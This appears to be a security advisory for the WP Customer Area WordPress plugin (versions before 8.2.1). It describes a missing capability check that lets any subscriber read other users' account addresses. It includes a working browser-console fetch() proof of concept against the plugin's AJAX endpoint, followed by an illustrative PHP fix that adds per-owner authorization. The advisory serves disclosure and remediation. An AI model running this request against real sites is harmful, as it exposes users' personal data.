wpexploit
Krzysztof Zając (CERT PL)
WPEX-ID:A224B984-770A-4534-B689-0701B582B388
Jan 10, 2024 - 12:00 a.m.

WP Customer Area < 8.2.1 - Subscriber+ Account Address Leak

Tags: wordpress, customer area, security breach, subscriber, address leak

EPSS: 0.0005 (Low), percentile 18.3%

Description

The plugin does not properly validate user capabilities in some of its AJAX actions, allowing any user to retrieve another user's account address.

Run the command below in the browser's developer console while logged in to the blog as a subscriber and viewing your own edit account page (https://example.com/customer-area/my-account/edit-account/):

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=cuar_load_address_from_owner&owner[type]=usr&owner[ids][]=__ADD_USER_ID__&address_id=home_address&cuar_nonce=" + document.querySelector('div.cuar-home-address input#cuar_nonce').value,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})
  .then((response) => response.text())
  .then((data) => {
    console.log(data);
  });
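
The check the description says is missing, as an added sketch that is not WP Customer Area's code or its actual patch: a valid nonce is followed by a per-owner authorization decision. The function names, the nonce action and the user-meta key are assumptions; only the AJAX action name and the request fields come from the page.

```php
<?php
// Added example: hypothetical handler, not WP Customer Area's source code.
// Only the AJAX action name and request field names come from the page.

/** Pure decision: may $actorId read the address of every ID in $ownerIds? */
function example_can_read_addresses(int $actorId, array $ownerIds, callable $canEditUser): bool
{
    if ($actorId <= 0 || $ownerIds === []) {
        return false; // anonymous caller or empty request: deny
    }
    foreach ($ownerIds as $ownerId) {
        // Own record is allowed; any other record needs an explicit capability.
        if ($ownerId !== $actorId && !$canEditUser($ownerId)) {
            return false;
        }
    }
    return true;
}

function example_load_address_from_owner(): void
{
    // A nonce only shows the request came from a page served to this session
    // (CSRF protection). A subscriber gets one on their own edit-account page,
    // so it says nothing about whose data the caller may read.
    check_ajax_referer('example_nonce_action', 'cuar_nonce'); // nonce action name is assumed

    $owner    = isset($_POST['owner']) ? (array) wp_unslash($_POST['owner']) : [];
    $ownerIds = array_values(array_filter(array_map('absint', (array) ($owner['ids'] ?? []))));

    $allowed = example_can_read_addresses(
        get_current_user_id(),
        $ownerIds,
        static fn (int $id): bool => current_user_can('edit_user', $id)
    );
    if (!$allowed) {
        wp_send_json_error(['message' => 'Forbidden'], 403); // sends JSON and exits
    }

    // Assumed storage: one user-meta entry per address ID (hypothetical key name).
    $addressId = sanitize_key($_POST['address_id'] ?? '');
    $addresses = [];
    foreach ($ownerIds as $id) {
        $addresses[$id] = get_user_meta($id, 'example_address_' . $addressId, true);
    }
    wp_send_json_success($addresses);
}
// wp_ajax_* fires for logged-in users only; no wp_ajax_nopriv_* hook is registered.
add_action('wp_ajax_cuar_load_address_from_owner', 'example_load_address_from_owner');
```

The decision function takes the capability check as a callable so it can be unit-tested without loading WordPress.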
